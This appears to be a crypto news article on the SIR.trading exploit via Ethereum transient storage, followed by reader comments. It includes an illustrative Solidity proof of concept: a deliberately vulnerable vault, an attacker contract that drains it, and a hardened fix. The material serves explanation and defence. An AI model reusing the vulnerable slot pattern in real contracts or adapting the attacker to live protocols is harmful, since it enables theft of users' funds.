
Ethereum Transient Storage Emerges as New DeFi Attack Vector After SIR.trading Exploit

A $355,000 exploit of the Ethereum-based DeFi protocol SIR.trading on March 30, 2025 turned a previously theoretical attack surface into a practical one, and could reshape how developers approach smart contract security. The breach, which drained the protocol's entire total value locked (TVL), leveraged transient storage, a feature Ethereum introduced in the Dencun upgrade of March 2024, in what security researchers believe is the first known exploitation of the mechanism in the wild.

The Exploit Mechanics

The attack centered on the uniswapV3SwapCallback function of SIR.trading's Vault contract, the hook that a Uniswap V3 pool calls back into during a swap. Blockchain security firm TenArmor was the first to publicly flag the incident on March 30, noting unusual transaction patterns that indicated an exploit in progress. According to subsequent analysis by Decurity and SlowMist's MistEye monitoring system, the attacker manipulated transient storage, the temporary data store introduced by EIP-1153 as part of Ethereum's Dencun hard fork, to defeat a security check that the callback performs during transaction execution.

Transient storage (the TSTORE and TLOAD opcodes) holds data that lives only for the duration of a single transaction and is discarded when the transaction ends; within that transaction it is visible to every call into the same contract, including re-entrant calls and callbacks. It was introduced as a cheaper alternative to regular storage for values that only need to survive one transaction, such as re-entrancy locks, but the SIR.trading exploit demonstrates how that same property can be weaponized: a value written to a transient slot in one call frame is still there when a later call frame reads it. The attacker used the callback to manipulate security-relevant data mid-transaction, redirecting $355,000 in funds to an address under their control. The stolen assets were subsequently laundered through Railgun, a privacy-focused transaction protocol.

Consensys Diligence's end-of-year report classified the attack vector as "Transient Storage Manipulation + Vanity Address Bruteforce," noting that the attacker combined the novel storage manipulation with a brute-forced vanity address, an address generated repeatedly until its value fit the check the attacker needed to pass.

Affected Systems

SIR.trading, a leveraged trading protocol built on Ethereum, lost its entire TVL in the attack. With Bitcoin trading around $82,334 and Ethereum near $1,806 at the time, the exploit sent ripples through the DeFi community, particularly among protocols that had integrated transient storage features following the Dencun upgrade. The incident raises questions about how many other protocols may be exposed to similar vulnerabilities.

Following the exploit, SIR.trading’s founder publicly appealed for the return of the stolen funds, even offering a $100,000 bounty to the attacker. The protocol’s complete TVL wipeout left users with no recoverable funds, highlighting the catastrophic potential of vulnerabilities in protocols with concentrated liquidity positions.

The Mitigation Strategy

Security researchers have outlined several defensive measures for protocols that use transient storage. First, a callback that authorizes its caller by reading a transient slot must treat that slot as single-purpose: never reuse it for other data within the same transaction, and clear it (or revert) once the expected callback has run. Traditional re-entrancy guards are not enough on their own, because transient values survive across call frames until the transaction ends, so a stale or overwritten value can satisfy a check in a later call that the guard was never designed to cover.

Second, protocols should undergo audits that focus specifically on EIP-1153 integration points: standard smart contract audits may not cover every place a transient slot is written, read and reused. Third, real-time monitoring such as SlowMist's MistEye, which flagged the SIR.trading attack, should be deployed to alert on anomalous transaction patterns. The caveat is that an exploit that completes within a single transaction leaves no window to react, so monitoring complements code-level fixes rather than replacing them.
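As an added illustration (this is not SIR.trading's source, which the article does not reproduce), the Solidity below shows the class of bug described in the exploit mechanics and the fix the mitigation advice calls for: a swap callback that authorizes its caller by comparing msg.sender to a value held in transient storage, then reuses that same transient slot for a numeric result, so that an address equal to the stored number (found by brute force, as the Consensys classification suggests) can call the callback directly later in the same transaction. The contract names, the IPool interface, the simplified callback signature and the single-slot layout are assumptions made for the example. A hardened vault follows in the same block: it dedicates a transient slot to authorization, makes it single-use, and requires it to be cleared before the swap returns.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28; // `transient` state variables need 0.8.28+ and the Cancun EVM target

// Added illustration, not SIR.trading's code. The pool interface, contract names
// and the slot layout are assumptions made for this example.
interface IPool {
    // Assumed: the pool takes `amountIn`, then calls swapCallback() on msg.sender.
    function swap(address recipient, uint256 amountIn, bytes calldata data) external;
}

contract VulnerableVault {
    mapping(address => uint256) public balances;

    // One transient slot used for two unrelated meanings at different moments:
    // first "which pool may call us back", later "how much the swap returned".
    uint256 transient scratch;

    function doSwap(IPool pool, uint256 amountIn) external {
        scratch = uint256(uint160(address(pool))); // authorize the pool for the callback
        pool.swap(address(this), amountIn, abi.encode(msg.sender));
        // BUG 1: the slot is never cleared, so its last value survives until the tx ends.
    }

    // Called by the pool during swap().
    function swapCallback(uint256 amountOut, bytes calldata data) external {
        require(msg.sender == address(uint160(scratch)), "unauthorized callback");
        address user = abi.decode(data, (address));
        balances[user] += amountOut;
        // BUG 2: the authorization slot is overwritten with a swap-dependent number.
        // Whoever controls an address equal to that number (read as 160 bits)
        // now passes the require() above on a direct call in the same transaction.
        scratch = amountOut;
    }
}

// Attacker contract. Assumption for the example: it was deployed at a brute-forced
// address whose 160-bit value equals the amountOut the first swap writes into `scratch`
// (the attacker is assumed to be able to steer amountOut to that exact value).
contract Attacker {
    VulnerableVault immutable vault;
    constructor(VulnerableVault v) { vault = v; }

    function drain(IPool pool, uint256 amountIn, uint256 fakeAmountOut) external {
        // 1. Legitimate swap: the pool's callback leaves scratch == amountOut == uint160(address(this)).
        vault.doSwap(pool, amountIn);
        // 2. Direct call with no pool involved: the stale slot authorizes this contract,
        //    and the vault credits an arbitrary amount to the attacker.
        vault.swapCallback(fakeAmountOut, abi.encode(address(this)));
    }
}

contract HardenedVault {
    mapping(address => uint256) public balances;

    address transient expectedCaller; // dedicated to authorization and nothing else
    uint256 transient lastAmountOut;  // data gets its own slot

    function doSwap(IPool pool, uint256 amountIn) external {
        require(expectedCaller == address(0), "swap already in progress"); // re-entrancy guard
        expectedCaller = address(pool);
        pool.swap(address(this), amountIn, abi.encode(msg.sender));
        // The callback clears the slot; if it is still set, the pool never called back.
        // Reverting also discards all transient state written in this transaction.
        require(expectedCaller == address(0), "pool did not call back");
    }

    function swapCallback(uint256 amountOut, bytes calldata data) external {
        require(msg.sender != address(0) && msg.sender == expectedCaller, "unauthorized callback");
        expectedCaller = address(0); // single use: a second callback in this tx is rejected
        address user = abi.decode(data, (address));
        balances[user] += amountOut;
        lastAmountOut = amountOut;   // never written to the authorization slot
    }
}
```

The real Uniswap V3 hook is uniswapV3SwapCallback(int256, int256, bytes); the example simplifies the signature to keep the slot-reuse pattern visible. The invariant an auditor should check at every EIP-1153 integration point is the one the hardened contract enforces: a transient value that gates a caller check is written exactly once per transaction, is never overwritten with data, and is cleared (or the transaction reverted) before the entry point returns. In a Foundry test the Attacker can be placed at an arbitrary chosen address with vm.etch to exercise the vulnerable path without actually brute-forcing one.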

Lessons Learned

The SIR.trading exploit carries a sobering message for the broader DeFi ecosystem: every new Ethereum Improvement Proposal can introduce attack surfaces as well as capabilities. The Dencun upgrade, primarily celebrated for reducing layer-2 transaction costs through blob transactions, also quietly introduced transient storage (EIP-1153), a feature that, as March 30 demonstrated, carries significant security implications.

March 2025 saw total Web3 security losses of approximately $33.99 million across 13 hacking incidents, according to SlowMist’s monthly report. Phishing attacks affected nearly 6,000 victims with $6.366 million in losses. The SIR.trading exploit, while not the largest incident of the month, stands out for its novel attack vector that could portend a new category of DeFi vulnerabilities.

User Action Required

For users, the incident reinforces the importance of due diligence before depositing funds into any DeFi protocol, particularly those that have recently upgraded to leverage new Ethereum features. Users should verify that protocols have undergone comprehensive security audits covering all EIP integrations, monitor security alert channels for real-time incident notifications, and avoid concentrating large portions of their portfolio in any single protocol. In a market where Bitcoin trades above $82,000 and the total crypto market cap exceeds $2.5 trillion, the incentive for sophisticated attacks will only grow.

Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before engaging with any DeFi protocol.


10 thoughts on “Ethereum Transient Storage Emerges as New DeFi Attack Vector After SIR.trading Exploit”

  1. EIP-1153 transient storage was supposed to save gas and instead it became an attack vector. classic Ethereum unintended consequences.

    1. 0xTransient.eth

      the SIR.trading team probably thought they were being clever using transient storage for gas optimization. clever is the enemy of safe.

    2. gas optimization creating attack vectors is peak ethereum. every EIP that saves gas seems to introduce a new class of vulnerability. the tradeoff never ends

      1. the tradeoff never ends because every gas optimization changes the execution model. TSTORE was clean on paper but the interaction with callback functions was underspecified

  2. first known exploitation of transient storage in the wild. this is going to trigger a wave of audits checking Dencun-related code paths.

    1. Tomasz K. the Dencun audit wave is already starting. saw three protocol teams announce emergency reviews of their EIP-1153 usage this week alone. $355K loss triggering millions in audit fees

  3. $355K is relatively small but the attack pattern is what matters. any protocol using TSTORE in security checks should be re-audited immediately.

    1. opcode_scan_ 355K drained but the audit costs from this one incident will be 10x that. every TSTORE protocol scrambling for reviews right now

    2. sec_research_

      agreed on re-audit urgency. the attack pattern is transferable to any protocol using TSTORE for access control checks, not just SIR.trading

      1. reentrancy_owl

        sec_research_ the transferable pattern is the real danger. any DeFi protocol that used TSTORE for auth checks in swap callbacks needs an emergency review
